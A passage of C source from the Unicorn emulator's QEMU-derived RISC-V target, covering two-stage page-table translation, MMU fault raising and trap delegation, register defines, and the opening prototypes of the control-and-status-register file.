*env, hwaddr *physical, int *prot, target_ulong addr, int access_type, int mmu_idx, bool first_stage, bool two_stage) { /* NOTE: the env->pc value visible here will not be * correct, but the value visible to the exception handler * (riscv_cpu_do_interrupt) is correct */ MemTxResult res; MemTxAttrs attrs = MEMTXATTRS_UNSPECIFIED; int mode = mmu_idx; bool use_background = false; hwaddr base; int levels = 0, ptidxbits = 0, ptesize = 0, vm, sum, mxr, widened; /* * Check if we should use the background registers for the two * stage translation. 
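     * (Note: the "background registers" are the vsatp/vsstatus copies of
     * the S-mode CSRs; selecting them makes the walk below use the guest's
     * own page-table root even though software is currently running with
     * V=0.)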
We don't need to check if we actually need * two stage translation as that happened before this function * was called. Background registers will be used if the guest has * forced a two stage translation to be on (in HS or M mode). */ if (mode == PRV_M && access_type != MMU_INST_FETCH) { if (get_field(env->mstatus, MSTATUS_MPRV)) { mode = get_field(env->mstatus, MSTATUS_MPP); if (riscv_has_ext(env, RVH) && MSTATUS_MPV_ISSET(env)) { use_background = true; } } } if (mode == PRV_S && access_type != MMU_INST_FETCH && riscv_has_ext(env, RVH) && !riscv_cpu_virt_enabled(env)) { if (get_field(env->hstatus, HSTATUS_SPRV)) { mode = get_field(env->mstatus, SSTATUS_SPP); use_background = true; } } if (first_stage == false) { /* We are in stage 2 translation, this is similar to stage 1. */ /* Stage 2 is always taken as U-mode */ mode = PRV_U; } if (mode == PRV_M || !riscv_feature(env, RISCV_FEATURE_MMU)) { *physical = addr; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TRANSLATE_SUCCESS; } *prot = 0; if (first_stage == true) { mxr = get_field(env->mstatus, MSTATUS_MXR); } else { mxr = get_field(env->vsstatus, MSTATUS_MXR); } if (env->priv_ver >= PRIV_VERSION_1_10_0) { if (first_stage == true) { if (use_background) { base = (hwaddr)get_field(env->vsatp, SATP_PPN) << PGSHIFT; vm = get_field(env->vsatp, SATP_MODE); } else { base = (hwaddr)get_field(env->satp, SATP_PPN) << PGSHIFT; vm = get_field(env->satp, SATP_MODE); } widened = 0; } else { base = (hwaddr)get_field(env->hgatp, HGATP_PPN) << PGSHIFT; vm = get_field(env->hgatp, HGATP_MODE); widened = 2; } sum = get_field(env->mstatus, MSTATUS_SUM); switch (vm) { case VM_1_10_SV32: levels = 2; ptidxbits = 10; ptesize = 4; break; case VM_1_10_SV39: levels = 3; ptidxbits = 9; ptesize = 8; break; case VM_1_10_SV48: levels = 4; ptidxbits = 9; ptesize = 8; break; case VM_1_10_SV57: levels = 5; ptidxbits = 9; ptesize = 8; break; case VM_1_10_MBARE: *physical = addr; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TRANSLATE_SUCCESS; default: g_assert_not_reached(); } } else { widened = 0; base = (hwaddr)(env->sptbr) << PGSHIFT; sum = !get_field(env->mstatus, MSTATUS_PUM); vm = get_field(env->mstatus, MSTATUS_VM); switch (vm) { case VM_1_09_SV32: levels = 2; ptidxbits = 10; ptesize = 4; break; case VM_1_09_SV39: levels = 3; ptidxbits = 9; ptesize = 8; break; case VM_1_09_SV48: levels = 4; ptidxbits = 9; ptesize = 8; break; case VM_1_09_MBARE: *physical = addr; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TRANSLATE_SUCCESS; default: g_assert_not_reached(); } } CPUState *cs = env_cpu(env); int va_bits = PGSHIFT + levels * ptidxbits + widened; target_ulong mask, masked_msbs; if (TARGET_LONG_BITS > (va_bits - 1)) { mask = (1L << (TARGET_LONG_BITS - (va_bits - 1))) - 1; } else { mask = 0; } masked_msbs = (addr >> (va_bits - 1)) & mask; if (masked_msbs != 0 && masked_msbs != mask) { return TRANSLATE_FAIL; } int ptshift = (levels - 1) * ptidxbits; int i; #if !TCG_OVERSIZED_GUEST restart: #endif for (i = 0; i < levels; i++, ptshift -= ptidxbits) { target_ulong idx; if (i == 0) { idx = (addr >> (PGSHIFT + ptshift)) & ((1 << (ptidxbits + widened)) - 1); } else { idx = (addr >> (PGSHIFT + ptshift)) & ((1 << ptidxbits) - 1); } /* check that physical address of PTE is legal */ hwaddr pte_addr; if (two_stage && first_stage) { hwaddr vbase; /* Do the second stage translation on the base PTE address. 
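             * (Note: each level of the first-stage walk re-enters
             * get_physical_address() with first_stage=false, because the
             * guest's page tables hold guest-physical, not host-physical,
             * addresses.)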
*/ get_physical_address(env, &vbase, prot, base, access_type, mmu_idx, false, true); pte_addr = vbase + idx * ptesize; } else { pte_addr = base + idx * ptesize; } if (riscv_feature(env, RISCV_FEATURE_PMP) && !pmp_hart_has_privs(env, pte_addr, sizeof(target_ulong), 1 << MMU_DATA_LOAD, PRV_S)) { return TRANSLATE_PMP_FAIL; } #if defined(TARGET_RISCV32) #ifdef UNICORN_ARCH_POSTFIX target_ulong pte = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pte_addr, attrs, &res); #else target_ulong pte = address_space_ldl(cs->as->uc, cs->as, pte_addr, attrs, &res); #endif #elif defined(TARGET_RISCV64) #ifdef UNICORN_ARCH_POSTFIX target_ulong pte = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pte_addr, attrs, &res); #else target_ulong pte = address_space_ldq(cs->as->uc, cs->as, pte_addr, attrs, &res); #endif #endif if (res != MEMTX_OK) { return TRANSLATE_FAIL; } hwaddr ppn = pte >> PTE_PPN_SHIFT; if (!(pte & PTE_V)) { /* Invalid PTE */ return TRANSLATE_FAIL; } else if (!(pte & (PTE_R | PTE_W | PTE_X))) { /* Inner PTE, continue walking */ base = ppn << PGSHIFT; } else if ((pte & (PTE_R | PTE_W | PTE_X)) == PTE_W) { /* Reserved leaf PTE flags: PTE_W */ return TRANSLATE_FAIL; } else if ((pte & (PTE_R | PTE_W | PTE_X)) == (PTE_W | PTE_X)) { /* Reserved leaf PTE flags: PTE_W + PTE_X */ return TRANSLATE_FAIL; } else if ((pte & PTE_U) && ((mode != PRV_U) && (!sum || access_type == MMU_INST_FETCH))) { /* User PTE flags when not U mode and mstatus.SUM is not set, or the access type is an instruction fetch */ return TRANSLATE_FAIL; } else if (!(pte & PTE_U) && (mode != PRV_S)) { /* Supervisor PTE flags when not S mode */ return TRANSLATE_FAIL; } else if (ppn & ((1ULL << ptshift) - 1)) { /* Misaligned PPN */ return TRANSLATE_FAIL; } else if (access_type == MMU_DATA_LOAD && !((pte & PTE_R) || ((pte & PTE_X) && mxr))) { /* Read access check failed */ return TRANSLATE_FAIL; } else if (access_type == MMU_DATA_STORE && !(pte & PTE_W)) { /* Write access check failed */ return TRANSLATE_FAIL; } else if (access_type == MMU_INST_FETCH && !(pte & PTE_X)) { /* Fetch access check failed */ return TRANSLATE_FAIL; } else { /* if necessary, set accessed and dirty bits. */ target_ulong updated_pte = pte | PTE_A | (access_type == MMU_DATA_STORE ? PTE_D : 0); /* Page table updates need to be atomic with MTTCG enabled */ if (updated_pte != pte) { /* * - if accessed or dirty bits need updating, and the PTE is * in RAM, then we do so atomically with a compare and swap. * - if the PTE is in IO space or ROM, then it can't be updated * and we return TRANSLATE_FAIL. * - if the PTE changed by the time we went to update it, then * it is no longer valid and we must re-walk the page table. 
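             * (Note: the re-walk is the "goto restart" below, which jumps
             * back to the restart label placed before the walk loop; on
             * TCG_OVERSIZED_GUEST builds a plain store is used instead of
             * the compare-and-swap, since MTTCG is unavailable there.)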
*/ MemoryRegion *mr; hwaddr l = sizeof(target_ulong), addr1; mr = address_space_translate(cs->as, pte_addr, &addr1, &l, false, MEMTXATTRS_UNSPECIFIED); if (memory_region_is_ram(mr)) { target_ulong *pte_pa = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); #if TCG_OVERSIZED_GUEST /* MTTCG is not enabled on oversized TCG guests so * page table updates do not need to be atomic */ *pte_pa = pte = updated_pte; #else target_ulong old_pte = #ifdef _MSC_VER atomic_cmpxchg((long *)pte_pa, pte, updated_pte); #else atomic_cmpxchg(pte_pa, pte, updated_pte); #endif if (old_pte != pte) { goto restart; } else { pte = updated_pte; } #endif } else { /* misconfigured PTE in ROM (AD bits are not preset) or * PTE is in IO space and can't be updated atomically */ return TRANSLATE_FAIL; } } /* for superpage mappings, make a fake leaf PTE for the TLB's benefit. */ target_ulong vpn = addr >> PGSHIFT; if (i == 0) { *physical = (ppn | (vpn & ((1L << (ptshift + widened)) - 1))) << PGSHIFT; } else { *physical = (ppn | (vpn & ((1L << ptshift) - 1))) << PGSHIFT; } /* set permissions on the TLB entry */ if ((pte & PTE_R) || ((pte & PTE_X) && mxr)) { *prot |= PAGE_READ; } if ((pte & PTE_X)) { *prot |= PAGE_EXEC; } /* add write permission on stores or if the page is already dirty, so that we TLB miss on later writes to update the dirty bit */ if ((pte & PTE_W) && (access_type == MMU_DATA_STORE || (pte & PTE_D))) { *prot |= PAGE_WRITE; } return TRANSLATE_SUCCESS; } } return TRANSLATE_FAIL; } static void raise_mmu_exception(CPURISCVState *env, target_ulong address, MMUAccessType access_type, bool pmp_violation, bool first_stage) { CPUState *cs = env_cpu(env); int page_fault_exceptions; if (first_stage) { page_fault_exceptions = (env->priv_ver >= PRIV_VERSION_1_10_0) && get_field(env->satp, SATP_MODE) != VM_1_10_MBARE && !pmp_violation; } else { page_fault_exceptions = get_field(env->hgatp, HGATP_MODE) != VM_1_10_MBARE && !pmp_violation; } switch (access_type) { case MMU_INST_FETCH: if (riscv_cpu_virt_enabled(env) && !first_stage) { cs->exception_index = RISCV_EXCP_INST_GUEST_PAGE_FAULT; } else { cs->exception_index = page_fault_exceptions ? RISCV_EXCP_INST_PAGE_FAULT : RISCV_EXCP_INST_ACCESS_FAULT; } break; case MMU_DATA_LOAD: if (riscv_cpu_virt_enabled(env) && !first_stage) { cs->exception_index = RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT; } else { cs->exception_index = page_fault_exceptions ? RISCV_EXCP_LOAD_PAGE_FAULT : RISCV_EXCP_LOAD_ACCESS_FAULT; } break; case MMU_DATA_STORE: if (riscv_cpu_virt_enabled(env) && !first_stage) { cs->exception_index = RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT; } else { cs->exception_index = page_fault_exceptions ? 
RISCV_EXCP_STORE_PAGE_FAULT : RISCV_EXCP_STORE_AMO_ACCESS_FAULT;
        }
        break;
    default:
        g_assert_not_reached();
    }
    env->badaddr = address;
}

hwaddr riscv_cpu_get_phys_page_debug(CPUState *cs, vaddr addr)
{
    RISCVCPU *cpu = RISCV_CPU(cs);
    CPURISCVState *env = &cpu->env;
    hwaddr phys_addr;
    int prot;
    int mmu_idx = cpu_mmu_index(&cpu->env, false);

    if (get_physical_address(env, &phys_addr, &prot, addr, 0, mmu_idx,
                             true, riscv_cpu_virt_enabled(env))) {
        return -1;
    }

    if (riscv_cpu_virt_enabled(env)) {
        if (get_physical_address(env, &phys_addr, &prot, phys_addr,
                                 0, mmu_idx, false, true)) {
            return -1;
        }
    }

    return phys_addr;
}

void riscv_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr,
                                     vaddr addr, unsigned size,
                                     MMUAccessType access_type,
                                     int mmu_idx, MemTxAttrs attrs,
                                     MemTxResult response, uintptr_t retaddr)
{
    RISCVCPU *cpu = RISCV_CPU(cs);
    CPURISCVState *env = &cpu->env;

    if (access_type == MMU_DATA_STORE) {
        cs->exception_index = RISCV_EXCP_STORE_AMO_ACCESS_FAULT;
    } else {
        cs->exception_index = RISCV_EXCP_LOAD_ACCESS_FAULT;
    }

    env->badaddr = addr;
    riscv_raise_exception(&cpu->env, cs->exception_index, retaddr);
}

void riscv_cpu_do_unaligned_access(CPUState *cs, vaddr addr,
                                   MMUAccessType access_type, int mmu_idx,
                                   uintptr_t retaddr)
{
    RISCVCPU *cpu = RISCV_CPU(cs);
    CPURISCVState *env = &cpu->env;
    switch (access_type) {
    case MMU_INST_FETCH:
        cs->exception_index = RISCV_EXCP_INST_ADDR_MIS;
        break;
    case MMU_DATA_LOAD:
        cs->exception_index = RISCV_EXCP_LOAD_ADDR_MIS;
        break;
    case MMU_DATA_STORE:
        cs->exception_index = RISCV_EXCP_STORE_AMO_ADDR_MIS;
        break;
    default:
        g_assert_not_reached();
    }
    env->badaddr = addr;
    riscv_raise_exception(env, cs->exception_index, retaddr);
}

bool riscv_cpu_tlb_fill(CPUState *cs, vaddr address, int size,
                        MMUAccessType access_type, int mmu_idx,
                        bool probe, uintptr_t retaddr)
{
    RISCVCPU *cpu = RISCV_CPU(cs);
    CPURISCVState *env = &cpu->env;
    vaddr im_address;
    hwaddr pa = 0;
    int prot;
    bool pmp_violation = false;
    bool m_mode_two_stage = false;
    bool hs_mode_two_stage = false;
    bool first_stage_error = true;
    int ret = TRANSLATE_FAIL;
    int mode = mmu_idx;

    env->guest_phys_fault_addr = 0;

    qemu_log_mask(CPU_LOG_MMU, "%s ad %" VADDR_PRIx " rw %d mmu_idx %d\n",
                  __func__, address, access_type, mmu_idx);

    /*
     * Determine if we are in M mode and MPRV is set or in HS mode and SPRV is
     * set and we want to access a virtualisation address.
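     * (Note: that is, an address that must still go through the two-stage,
     * guest-virtual to host-physical translation even though V=0 at the
     * moment of the access.)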
*/ if (riscv_has_ext(env, RVH)) { m_mode_two_stage = env->priv == PRV_M && access_type != MMU_INST_FETCH && get_field(env->mstatus, MSTATUS_MPRV) && MSTATUS_MPV_ISSET(env); hs_mode_two_stage = env->priv == PRV_S && !riscv_cpu_virt_enabled(env) && access_type != MMU_INST_FETCH && get_field(env->hstatus, HSTATUS_SPRV) && get_field(env->hstatus, HSTATUS_SPV); } if (mode == PRV_M && access_type != MMU_INST_FETCH) { if (get_field(env->mstatus, MSTATUS_MPRV)) { mode = get_field(env->mstatus, MSTATUS_MPP); } } if (riscv_cpu_virt_enabled(env) || m_mode_two_stage || hs_mode_two_stage) { /* Two stage lookup */ ret = get_physical_address(env, &pa, &prot, address, access_type, mmu_idx, true, true); qemu_log_mask(CPU_LOG_MMU, "%s 1st-stage address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx " prot %d\n", __func__, address, ret, pa, prot); if (ret != TRANSLATE_FAIL) { /* Second stage lookup */ im_address = pa; ret = get_physical_address(env, &pa, &prot, im_address, access_type, mmu_idx, false, true); qemu_log_mask(CPU_LOG_MMU, "%s 2nd-stage address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx " prot %d\n", __func__, im_address, ret, pa, prot); if (riscv_feature(env, RISCV_FEATURE_PMP) && (ret == TRANSLATE_SUCCESS) && !pmp_hart_has_privs(env, pa, size, 1 << access_type, mode)) { ret = TRANSLATE_PMP_FAIL; } if (ret != TRANSLATE_SUCCESS) { /* * Guest physical address translation failed, this is a HS * level exception */ first_stage_error = false; env->guest_phys_fault_addr = (im_address | (address & (TARGET_PAGE_SIZE - 1))) >> 2; } } } else { /* Single stage lookup */ ret = get_physical_address(env, &pa, &prot, address, access_type, mmu_idx, true, false); qemu_log_mask(CPU_LOG_MMU, "%s address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx " prot %d\n", __func__, address, ret, pa, prot); } if (riscv_feature(env, RISCV_FEATURE_PMP) && (ret == TRANSLATE_SUCCESS) && !pmp_hart_has_privs(env, pa, size, 1 << access_type, mode)) { ret = TRANSLATE_PMP_FAIL; } if (ret == TRANSLATE_PMP_FAIL) { pmp_violation = true; } if (ret == TRANSLATE_SUCCESS) { tlb_set_page(cs, address & TARGET_PAGE_MASK, pa & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } else if (probe) { return false; } else { raise_mmu_exception(env, address, access_type, pmp_violation, first_stage_error); riscv_raise_exception(env, cs->exception_index, retaddr); } return true; } /* * Handle Traps * * Adapted from Spike's processor_t::take_trap. * */ void riscv_cpu_do_interrupt(CPUState *cs) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; bool force_hs_execp = riscv_cpu_force_hs_excep_enabled(env); target_ulong s; /* cs->exception is 32-bits wide unlike mcause which is XLEN-bits wide * so we mask off the MSB and separate into trap type and cause. */ bool async = !!(cs->exception_index & RISCV_EXCP_INT_FLAG); target_ulong cause = cs->exception_index & RISCV_EXCP_INT_MASK; target_ulong deleg = async ? 
env->mideleg : env->medeleg;
    target_ulong tval = 0;
    target_ulong htval = 0;
    target_ulong mtval2 = 0;

    if (!async) {
        /* set tval to badaddr for traps with address information */
        switch (cause) {
        case RISCV_EXCP_INST_GUEST_PAGE_FAULT:
        case RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT:
        case RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT:
            force_hs_execp = true;
            /* fallthrough */
        case RISCV_EXCP_INST_ADDR_MIS:
        case RISCV_EXCP_INST_ACCESS_FAULT:
        case RISCV_EXCP_LOAD_ADDR_MIS:
        case RISCV_EXCP_STORE_AMO_ADDR_MIS:
        case RISCV_EXCP_LOAD_ACCESS_FAULT:
        case RISCV_EXCP_STORE_AMO_ACCESS_FAULT:
        case RISCV_EXCP_INST_PAGE_FAULT:
        case RISCV_EXCP_LOAD_PAGE_FAULT:
        case RISCV_EXCP_STORE_PAGE_FAULT:
            tval = env->badaddr;
            break;
        default:
            break;
        }
        /* ecall is dispatched as one cause so translate based on mode */
        if (cause == RISCV_EXCP_U_ECALL) {
            assert(env->priv <= 3);
            if (env->priv == PRV_M) {
                cause = RISCV_EXCP_M_ECALL;
            } else if (env->priv == PRV_S && riscv_cpu_virt_enabled(env)) {
                cause = RISCV_EXCP_VS_ECALL;
            } else if (env->priv == PRV_S && !riscv_cpu_virt_enabled(env)) {
                cause = RISCV_EXCP_S_ECALL;
            } else if (env->priv == PRV_U) {
                cause = RISCV_EXCP_U_ECALL;
            }
        }
    }

    if (env->priv <= PRV_S &&
            cause < TARGET_LONG_BITS && ((deleg >> cause) & 1)) {
        /* handle the trap in S-mode */
        if (riscv_has_ext(env, RVH)) {
            target_ulong hdeleg = async ? env->hideleg : env->hedeleg;

            if (riscv_cpu_virt_enabled(env) && ((hdeleg >> cause) & 1) &&
                !force_hs_execp) {
                /*
                 * See if we need to adjust cause: yes if it is a VS-mode
                 * interrupt, no if the hypervisor has delegated one of HS
                 * mode's interrupts.
                 */
                if (cause == IRQ_VS_TIMER || cause == IRQ_VS_SOFT ||
                    cause == IRQ_VS_EXT)
                    cause = cause - 1;
                /* Trap to VS mode */
            } else if (riscv_cpu_virt_enabled(env)) {
                /* Trap into HS mode, from virt */
                riscv_cpu_swap_hypervisor_regs(env);
                env->hstatus = set_field(env->hstatus, HSTATUS_SP2V,
                                         get_field(env->hstatus, HSTATUS_SPV));
                env->hstatus = set_field(env->hstatus, HSTATUS_SP2P,
                                         get_field(env->mstatus, SSTATUS_SPP));
                env->hstatus = set_field(env->hstatus, HSTATUS_SPV,
                                         riscv_cpu_virt_enabled(env));

                htval = env->guest_phys_fault_addr;

                riscv_cpu_set_virt_enabled(env, 0);
                riscv_cpu_set_force_hs_excep(env, 0);
            } else {
                /* Trap into HS mode */
                env->hstatus = set_field(env->hstatus, HSTATUS_SP2V,
                                         get_field(env->hstatus, HSTATUS_SPV));
                env->hstatus = set_field(env->hstatus, HSTATUS_SP2P,
                                         get_field(env->mstatus, SSTATUS_SPP));
                env->hstatus = set_field(env->hstatus, HSTATUS_SPV,
                                         riscv_cpu_virt_enabled(env));

                htval = env->guest_phys_fault_addr;
            }
        }

        s = env->mstatus;
        s = set_field(s, MSTATUS_SPIE, env->priv_ver >= PRIV_VERSION_1_10_0 ?
            get_field(s, MSTATUS_SIE) : get_field(s, MSTATUS_UIE << env->priv));
        s = set_field(s, MSTATUS_SPP, env->priv);
        s = set_field(s, MSTATUS_SIE, 0);
        env->mstatus = s;
        env->scause = cause | ((target_ulong)async << (TARGET_LONG_BITS - 1));
        env->sepc = env->pc;
        env->sbadaddr = tval;
        env->htval = htval;
        env->pc = (env->stvec >> 2 << 2) +
            ((async && (env->stvec & 3) == 1) ? cause * 4 : 0);
        riscv_cpu_set_mode(env, PRV_S);
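        /*
         * (Note: (stvec >> 2 << 2) clears the two low mode bits to recover
         * the trap vector base address. In vectored mode, (stvec & 3) == 1,
         * an asynchronous trap enters at base + 4 * cause; synchronous
         * traps and direct mode enter at the base itself.)
         */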
    } else {
        /* handle the trap in M-mode */
        if (riscv_has_ext(env, RVH)) {
            if (riscv_cpu_virt_enabled(env)) {
                riscv_cpu_swap_hypervisor_regs(env);
            }
#ifdef TARGET_RISCV32
            env->mstatush = set_field(env->mstatush, MSTATUS_MPV,
                                      riscv_cpu_virt_enabled(env));
            env->mstatush = set_field(env->mstatush, MSTATUS_MTL,
                                      riscv_cpu_force_hs_excep_enabled(env));
#else
            env->mstatus = set_field(env->mstatus, MSTATUS_MPV,
                                     riscv_cpu_virt_enabled(env));
            env->mstatus = set_field(env->mstatus, MSTATUS_MTL,
                                     riscv_cpu_force_hs_excep_enabled(env));
#endif

            mtval2 = env->guest_phys_fault_addr;

            /* Trapping to M mode, virt is disabled */
            riscv_cpu_set_virt_enabled(env, 0);
            riscv_cpu_set_force_hs_excep(env, 0);
        }

        s = env->mstatus;
        s = set_field(s, MSTATUS_MPIE, env->priv_ver >= PRIV_VERSION_1_10_0 ?
            get_field(s, MSTATUS_MIE) : get_field(s, MSTATUS_UIE << env->priv));
        s = set_field(s, MSTATUS_MPP, env->priv);
        s = set_field(s, MSTATUS_MIE, 0);
        env->mstatus = s;
        env->mcause = cause | ~(((target_ulong)-1) >> async);
        env->mepc = env->pc;
        env->mbadaddr = tval;
        env->mtval2 = mtval2;
        env->pc = (env->mtvec >> 2 << 2) +
            ((async && (env->mtvec & 3) == 1) ? cause * 4 : 0);
        riscv_cpu_set_mode(env, PRV_M);
    }

    /* NOTE: it is not necessary to yield load reservations here. It is only
     * necessary for an SC from "another hart" to cause a load reservation
     * to be yielded. Refer to the memory consistency model section of the
     * RISC-V ISA Specification.
     */

    cs->exception_index = EXCP_NONE; /* mark handled to qemu */
}

unicorn-2.1.1/qemu/target/riscv/cpu_user.h

#ifndef TARGET_RISCV_CPU_USER_H
#define TARGET_RISCV_CPU_USER_H

#define xRA 1 /* return address (aka link register) */
#define xSP 2 /* stack pointer */
#define xGP 3 /* global pointer */
#define xTP 4 /* thread pointer */
#define xA0 10 /* gpr[10-17] are syscall arguments */
#define xA1 11
#define xA2 12
#define xA3 13
#define xA4 14
#define xA5 15
#define xA6 16
#define xA7 17 /* syscall number for RVI ABI */
#define xT0 5 /* syscall number for RVE ABI */

#endif

unicorn-2.1.1/qemu/target/riscv/csr.c

/*
 * RISC-V Control and Status Registers.
 *
 * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu
 * Copyright (c) 2017-2018 SiFive, Inc.
* * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "exec/exec-all.h" static int fs(CPURISCVState *env, int csrno); static int read_fflags(CPURISCVState *env, int csrno, target_ulong *val); static int write_fflags(CPURISCVState *env, int csrno, target_ulong val); static int read_frm(CPURISCVState *env, int csrno, target_ulong *val); static int write_frm(CPURISCVState *env, int csrno, target_ulong val); static int read_fcsr(CPURISCVState *env, int csrno, target_ulong *val); static int write_fcsr(CPURISCVState *env, int csrno, target_ulong val); static int ctr(CPURISCVState *env, int csrno); static int read_instret(CPURISCVState *env, int csrno, target_ulong *val); static int read_time(CPURISCVState *env, int csrno, target_ulong *val); static int any(CPURISCVState *env, int csrno); static int read_zero(CPURISCVState *env, int csrno, target_ulong *val); static int read_mhartid(CPURISCVState *env, int csrno, target_ulong *val); static int read_mstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_mstatus(CPURISCVState *env, int csrno, target_ulong val); static int read_misa(CPURISCVState *env, int csrno, target_ulong *val); static int write_misa(CPURISCVState *env, int csrno, target_ulong val); static int read_mideleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_mideleg(CPURISCVState *env, int csrno, target_ulong val); static int read_medeleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_medeleg(CPURISCVState *env, int csrno, target_ulong val); static int read_mie(CPURISCVState *env, int csrno, target_ulong *val); static int write_mie(CPURISCVState *env, int csrno, target_ulong val); static int read_mtvec(CPURISCVState *env, int csrno, target_ulong *val); static int write_mtvec(CPURISCVState *env, int csrno, target_ulong val); static int read_mcounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_mcounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_mucounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_mucounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_mscounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_mscounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_mscratch(CPURISCVState *env, int csrno, target_ulong *val); static int write_mscratch(CPURISCVState *env, int csrno, target_ulong val); static int read_mepc(CPURISCVState *env, int csrno, target_ulong *val); static int write_mepc(CPURISCVState *env, int csrno, target_ulong val); static int read_mcause(CPURISCVState *env, int csrno, target_ulong *val); static int write_mcause(CPURISCVState *env, int csrno, target_ulong val); static int read_mbadaddr(CPURISCVState *env, int csrno, target_ulong *val); static int write_mbadaddr(CPURISCVState *env, int csrno, target_ulong val); static int rmw_mip(CPURISCVState *env, int csrno, 
target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int smode(CPURISCVState *env, int csrno); static int read_sstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_sstatus(CPURISCVState *env, int csrno, target_ulong val); static int read_sie(CPURISCVState *env, int csrno, target_ulong *val); static int write_sie(CPURISCVState *env, int csrno, target_ulong val); static int read_stvec(CPURISCVState *env, int csrno, target_ulong *val); static int write_stvec(CPURISCVState *env, int csrno, target_ulong val); static int read_scounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_scounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_sscratch(CPURISCVState *env, int csrno, target_ulong *val); static int write_sscratch(CPURISCVState *env, int csrno, target_ulong val); static int read_sepc(CPURISCVState *env, int csrno, target_ulong *val); static int write_sepc(CPURISCVState *env, int csrno, target_ulong val); static int read_scause(CPURISCVState *env, int csrno, target_ulong *val); static int write_scause(CPURISCVState *env, int csrno, target_ulong val); static int read_sbadaddr(CPURISCVState *env, int csrno, target_ulong *val); static int write_sbadaddr(CPURISCVState *env, int csrno, target_ulong val); static int rmw_sip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int read_satp(CPURISCVState *env, int csrno, target_ulong *val); static int write_satp(CPURISCVState *env, int csrno, target_ulong val); static int read_hstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_hstatus(CPURISCVState *env, int csrno, target_ulong val); static int hmode(CPURISCVState *env, int csrno); static int read_hedeleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_hedeleg(CPURISCVState *env, int csrno, target_ulong val); static int read_hideleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_hideleg(CPURISCVState *env, int csrno, target_ulong val); static int rmw_hip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int read_hie(CPURISCVState *env, int csrno, target_ulong *val); static int write_hie(CPURISCVState *env, int csrno, target_ulong val); static int read_hcounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_hcounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_htval(CPURISCVState *env, int csrno, target_ulong *val); static int write_htval(CPURISCVState *env, int csrno, target_ulong val); static int read_htinst(CPURISCVState *env, int csrno, target_ulong *val); static int write_htinst(CPURISCVState *env, int csrno, target_ulong val); static int read_hgatp(CPURISCVState *env, int csrno, target_ulong *val); static int write_hgatp(CPURISCVState *env, int csrno, target_ulong val); static int read_htimedelta(CPURISCVState *env, int csrno, target_ulong *val); static int write_htimedelta(CPURISCVState *env, int csrno, target_ulong val); static int read_vsstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsstatus(CPURISCVState *env, int csrno, target_ulong val); static int rmw_vsip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int read_vsie(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsie(CPURISCVState *env, int csrno, target_ulong val); static int 
read_vstvec(CPURISCVState *env, int csrno, target_ulong *val); static int write_vstvec(CPURISCVState *env, int csrno, target_ulong val); static int read_vsscratch(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsscratch(CPURISCVState *env, int csrno, target_ulong val); static int read_vsepc(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsepc(CPURISCVState *env, int csrno, target_ulong val); static int read_vscause(CPURISCVState *env, int csrno, target_ulong *val); static int write_vscause(CPURISCVState *env, int csrno, target_ulong val); static int read_vstval(CPURISCVState *env, int csrno, target_ulong *val); static int write_vstval(CPURISCVState *env, int csrno, target_ulong val); static int read_vsatp(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsatp(CPURISCVState *env, int csrno, target_ulong val); static int read_mtval2(CPURISCVState *env, int csrno, target_ulong *val); static int write_mtval2(CPURISCVState *env, int csrno, target_ulong val); static int read_mtinst(CPURISCVState *env, int csrno, target_ulong *val); static int write_mtinst(CPURISCVState *env, int csrno, target_ulong val); static int read_pmpcfg(CPURISCVState *env, int csrno, target_ulong *val); static int write_pmpcfg(CPURISCVState *env, int csrno, target_ulong val); static int read_pmpaddr(CPURISCVState *env, int csrno, target_ulong *val); static int write_pmpaddr(CPURISCVState *env, int csrno, 